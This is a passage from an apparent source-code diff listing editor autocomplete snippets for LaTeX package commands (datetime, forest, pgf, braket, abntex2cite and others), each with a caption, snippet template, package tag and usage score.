'\\noexpand', + meta: 'minted-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'minted-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'minted-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'minted-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'minted-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'minted-cmd', + score: 0.008565354665444157, + }, + ], + xifthen: [ + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'xifthen-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'xifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'xifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'xifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'xifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: 
'\\setboolean{$1}{$2}', + meta: 'xifthen-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'xifthen-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'xifthen-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'xifthen-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'xifthen-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'xifthen-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'xifthen-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xifthen-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xifthen-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'xifthen-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'xifthen-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'xifthen-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'xifthen-cmd', + score: 0.028955796305270766, + }, + ], + relsize: [ + { + caption: '\\mathlarger{}', + snippet: '\\mathlarger{$1}', + meta: 'relsize-cmd', + score: 0.0031475241540308316, + }, + { + caption: '\\smaller', + snippet: '\\smaller', + meta: 'relsize-cmd', + score: 0.001271007880944704, + }, + ], + epsf: [ + { + caption: '\\epsfbox{}', + snippet: '\\epsfbox{$1}', + meta: 'epsf-cmd', + score: 0.00013712781345832882, + }, + ], + datetime: [ + { + caption: '\\shortmonthname[]', + snippet: '\\shortmonthname[$1]', + meta: 'datetime-cmd', + score: 0.00018524143860552933, + }, + { + caption: '\\THEYEAR', + snippet: '\\THEYEAR', + meta: 'datetime-cmd', + score: 8.638115929876123e-5, + }, + { + caption: '\\currenttime', + snippet: '\\currenttime', + meta: 'datetime-cmd', + score: 0.0002884868472087627, + }, + { + caption: '\\monthname', + snippet: '\\monthname', + meta: 'datetime-cmd', + score: 8.847106423071211e-5, + }, + { + caption: '\\monthname[]', + snippet: '\\monthname[$1]', + meta: 'datetime-cmd', + score: 8.847106423071211e-5, + }, + { + caption: '\\today', + snippet: '\\today', + meta: 'datetime-cmd', + score: 0.10733849317324783, + }, + { + caption: '\\THEMONTH', + snippet: '\\THEMONTH', + meta: 'datetime-cmd', + score: 8.638115929876123e-5, + }, + { + caption: '\\yyyymmdddate', + snippet: '\\yyyymmdddate', + meta: 'datetime-cmd', + score: 0.0002568405365040184, + }, + { + caption: '\\pdfdate', + snippet: '\\pdfdate', + meta: 'datetime-cmd', + score: 9.673490669434574e-5, + }, + { + caption: '\\dateseparator', + snippet: '\\dateseparator', + meta: 'datetime-cmd', + score: 0.00010966778823652713, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datetime-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\THEDAY', + snippet: '\\THEDAY', + meta: 'datetime-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\usdate', + snippet: '\\usdate', + meta: 'datetime-cmd', + score: 0.00020980148911330757, + }, + { + caption: '\\newdateformat{}{}', + snippet: '\\newdateformat{$1}{$2}', 
+ meta: 'datetime-cmd', + score: 8.638115929876123e-5, + }, + { + caption: '\\settimeformat{}', + snippet: '\\settimeformat{$1}', + meta: 'datetime-cmd', + score: 0.00010966778823652713, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datetime-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'datetime-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'datetime-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'datetime-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'datetime-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'datetime-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'datetime-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'datetime-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'datetime-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datetime-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'datetime-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'datetime-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'datetime-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'datetime-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'datetime-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'datetime-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'datetime-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'datetime-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datetime-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'datetime-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'datetime-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'datetime-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'datetime-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'datetime-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'datetime-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'datetime-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 
'datetime-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'datetime-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'datetime-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'datetime-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'datetime-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datetime-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datetime-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'datetime-cmd', + score: 0.0063276692758974925, + }, + ], + fontawesome: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'fontawesome-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fontawesome-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'fontawesome-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'fontawesome-cmd', + score: 0.2864294797053033, + }, + ], + forest: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'forest-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\bracketset{}', + snippet: '\\bracketset{$1}', + meta: 'forest-cmd', + score: 0.00014301574866674164, + }, + { + caption: '\\forestset{}', + snippet: '\\forestset{$1}', + meta: 'forest-cmd', + score: 0.0020596473883671114, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'forest-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'forest-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'forest-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'forest-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'forest-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'forest-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'forest-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'forest-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'forest-cmd', + score: 0.09973951908678011, + }, + { + caption: 
'\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'forest-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'forest-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'forest-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'forest-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'forest-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'forest-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'forest-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'forest-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'forest-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'forest-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'forest-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'forest-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'forest-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'forest-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'forest-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'forest-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'forest-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'forest-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'forest-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'forest-cmd', + score: 0.021170869458413965, 
+ }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'forest-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'forest-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'forest-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'forest-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'forest-cmd', + score: 0.00031058155311734754, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'forest-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'forest-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'forest-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'forest-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'forest-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'forest-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'forest-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'forest-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'forest-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'forest-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'forest-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'forest-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'forest-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'forest-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'forest-cmd', + score: 0.2864294797053033, + }, + ], + pgf: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgf-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + 
snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgf-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgf-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgf-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgf-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgf-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgf-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgf-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgf-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgf-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgf-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgf-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgf-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgf-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgf-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgf-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgf-cmd', + score: 0.0008147200475678891, + }, + { + caption: 
'\\csname', + snippet: '\\csname', + meta: 'pgf-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgf-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgf-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgf-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgf-cmd', + score: 0.2864294797053033, + }, + ], + pstricks: [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pstricks-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pstricks-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pstricks-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pstricks-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pstricks-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pstricks-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pstricks-cmd', + score: 0.006520475264573554, + }, + ], + fancybox: [ + { + caption: '\\shadowbox{}', + snippet: '\\shadowbox{$1}', + meta: 'fancybox-cmd', + score: 0.00107667147399019, + }, + { + caption: '\\doublebox', + snippet: '\\doublebox', + meta: 'fancybox-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'fancybox-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\thisfancypage{}{}', + snippet: '\\thisfancypage{$1}{$2}', + meta: 'fancybox-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\TheSbox', + snippet: '\\TheSbox', + meta: 'fancybox-cmd', + score: 4.5350034239275855e-5, + }, + ], + braket: [ + { + caption: '\\ket{}', + snippet: '\\ket{$1}', + meta: 'braket-cmd', + score: 0.0326276280979336, + }, + { + caption: '\\braket{}{}', + snippet: '\\braket{$1}{$2}', + meta: 'braket-cmd', + score: 0.004421747491186916, + }, + { + caption: '\\braket{}', + snippet: '\\braket{$1}', + meta: 'braket-cmd', + score: 0.004421747491186916, + }, + { + caption: '\\ketbra{}{}', + snippet: '\\ketbra{$1}{$2}', + meta: 'braket-cmd', + score: 0.0006317858348936015, + }, + { + caption: '\\ketbra', + snippet: '\\ketbra', + meta: 'braket-cmd', + score: 0.0006317858348936015, + }, + { + caption: '\\bra{}', + snippet: '\\bra{$1}', + meta: 'braket-cmd', + score: 0.005609763332417241, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'braket-cmd', + score: 0.008565354665444157, + }, + ], + import: [ + { + caption: '\\import{}{}', + snippet: '\\import{$1}{$2}', + meta: 'import-cmd', + score: 0.1265354812350108, + }, + ], + abntex2cite: [ + { + caption: '\\citeonline{}', + snippet: '\\citeonline{$1}', + meta: 'abntex2cite-cmd', + score: 0.014277840409455324, + }, + { + caption: '\\bibitem{}', + snippet: '\\bibitem{$1}', + meta: 'abntex2cite-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\bibitem[]{}', + snippet: '\\bibitem[$1]{$2}', + meta: 'abntex2cite-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\bibliographystyle{}', + snippet: '\\bibliographystyle{$1}', + meta: 'abntex2cite-cmd', + score: 0.25122317941387773, + }, + { + caption: '\\citeyear{}', + snippet: 
'\\citeyear{$1}', + meta: 'abntex2cite-cmd', + score: 0.01091041305836494, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'abntex2cite-cmd', + score: 2.341195220791228, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'abntex2cite-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\setstretch{}', + snippet: '\\setstretch{$1}', + meta: 'abntex2cite-cmd', + score: 0.019634763572332112, + }, + { + caption: '\\onehalfspacing', + snippet: '\\onehalfspacing', + meta: 'abntex2cite-cmd', + score: 0.010655415521079565, + }, + { + caption: '\\singlespacing', + snippet: '\\singlespacing', + meta: 'abntex2cite-cmd', + score: 0.008351544612280968, + }, + { + caption: '\\doublespacing', + snippet: '\\doublespacing', + meta: 'abntex2cite-cmd', + score: 0.007835428951987135, + }, + { + caption: '\\baselinestretch', + snippet: '\\baselinestretch', + meta: 'abntex2cite-cmd', + score: 0.03225350148161425, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'abntex2cite-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'abntex2cite-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'abntex2cite-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'abntex2cite-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: 